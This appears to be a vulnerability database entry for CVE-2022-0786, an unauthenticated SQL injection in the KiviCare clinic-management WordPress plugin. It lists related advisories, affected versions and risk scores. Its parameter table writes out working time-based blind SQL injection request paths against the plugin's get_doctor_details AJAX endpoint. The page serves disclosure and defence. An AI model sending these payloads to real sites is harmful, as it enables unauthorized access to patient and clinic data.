CVE-2022-0786

🗓️ 13 Jun 2022 12:41:32Reported by WPScanType

cve🔗 web.nvd.nist.gov📰️ 3 Media mentions👁 101 Views🌐 WEB

The KiviCare WordPress plugin before 2.3.9 is prone to SQL injection

Reporter	Title	Published	Views	Family All 14
ATTACKERKB	CVE-2022-0786	13 Jun 202213:15	–	attackerkb
Circl	CVE-2022-0786	26 Jan 202500:00	–	circl
CNNVD	WordPress plugin KiviCare SQL注入漏洞	13 Jun 202200:00	–	cnnvd
CNVD	WordPress Plugin KiviCare SQL Injection Vulnerability	15 Jun 202200:00	–	cnvd
Cvelist	CVE-2022-0786 KiviCare < 2.3.9 - Unauthenticated SQLi	13 Jun 202212:41	–	cvelist
Nuclei	WordPress KiviCare <2.3.9 - SQL Injection	24 Jun 202603:02	–	nuclei
NVD	CVE-2022-0786	13 Jun 202213:15	–	nvd
OSV	CVE-2022-0786	13 Jun 202213:15	–	osv
Patchstack	WordPress KiviCare plugin <= 2.3.8 - Unauthenticated SQL Injection (SQLi) vulnerability	23 May 202200:00	–	patchstack
Prion	Sql injection	13 Jun 202213:15	–	prion

NVD

Vulners

Node

iqonic kivicareRange<2.3.9wordpress

[
  {
    "product": "KiviCare – Clinic & Patient Management System (EHR)",
    "vendor": "Unknown",
    "versions": [
      {
        "lessThan": "2.3.9",
        "status": "affected",
        "version": "2.3.9",
        "versionType": "custom"
      }
    ]
  }
]

Source	Link
wpscan	www.wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30

Parameter	Position	Path	Description	CWE
action	query param	/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5Bid%5D=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_post)	CWE-89
route_name	query param	/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5Bid%5D=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_post)	CWE-89
clinic_id[id]	query param	/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5Bid%5D=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_post)	CWE-89
action	query param	/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_get)	CWE-89
route_name	query param	/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_get)	CWE-89
clinic_id	query param	/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_get)	CWE-89
action	query param	/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_get)	CWE-89
route_name	query param	/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_get)	CWE-89
clinic_id	query param	/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_get)	CWE-89
action	query param	/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b	SQL injection via unsanitised input in get_doctor_details AJAX endpoint (via ajax_get)	CWE-89

17 Jun 2026 04:21Current

9.7High risk

Vulners AI Score9.7

CVSS 27.5

CVSS 3.19.8

EPSS0.11226